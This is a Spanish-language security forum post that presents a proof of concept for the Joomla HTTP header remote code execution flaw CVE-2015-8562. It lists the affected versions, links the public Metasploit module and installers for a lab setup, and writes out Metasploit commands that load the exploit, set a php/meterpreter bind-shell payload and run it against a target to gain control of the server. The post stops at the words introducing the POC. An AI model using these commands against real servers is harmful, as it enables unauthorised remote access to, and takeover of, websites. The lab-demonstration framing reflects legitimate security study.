Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Franciscodc en Diciembre 26, 2015, 05:10:59 AM

Título: Joomla 0-Day - HTTP Headers Remote Code Execution - CVE-2015-8562
Publicado por: Franciscodc en Diciembre 26, 2015, 05:10:59 AM
Hola Gente recien me registre en este foro y este es mi tercer post. En esta ocacion por parte de la "OHCS" les traigo la prueba de concepto en la cual aprovechamos la vulnerabilidad de ejecucion remota de joomla, la cual permite ejecutar codigo por medio de las cabeceras y asi poder generar una shell remota que nos dara acceso y control al servidor.

Versiones de Joomla Afectadas : 1.5.0 a 3.4.5
Versiones de PHP Afectadas : Anteriores a 5.4.45

*****************************************************LINKS DESCARGAS NECESARIAS *****************************************************
Joomla Metasploit POC : https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/joomla_http_header_rce.rb

Joomla 3.4.5 : https://www.joomla.org/announcements/release-news/5634-joomla-3-4-6-released.html

Xampp server con php 5.4.4: http://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.0/xampp-win32-1.8.0-VC9-installer.exe/download


*************************************************************Comandos Utilizados *********************************************************
use exploit/multi/http/joomla_http_header_rce
set RHOST 192.168.0.5
set PAYLOAD php/meterpreter/bind_tcp
set LHOST 192.168.6.174
exploit


Aqui el POC: